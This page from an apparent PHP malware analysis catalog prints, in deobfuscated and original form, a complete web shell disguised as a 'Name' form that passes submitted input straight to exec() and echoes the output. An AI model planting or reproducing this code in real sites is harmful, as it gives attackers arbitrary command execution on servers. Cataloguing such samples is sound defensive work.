PHP Malware Analysis

Back to list

Tags

Execution
exec
Input
_POST

Deobfuscated code

<html>
<body>

<form method="post" action="<?php 
echo $_SERVER['PHP_SELF'];
?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php 
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // collect value of input field
    $command = $_POST['fname'];
    if (empty($command)) {
        echo "Name is empty";
    } else {
        $output = null;
        $retval = null;
        exec($command, $output, $retval);
        print_r($output);
    }
}
?>

</body>
</html>

Original code

<html>
<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
  // collect value of input field
  $command = $_POST['fname'];
  if (empty($command)) {
    echo "Name is empty";
  } else {
    $output=null;
    $retval=null;
    exec($command, $output, $retval);
    print_r($output);
  }
}
?>

</body>
</html>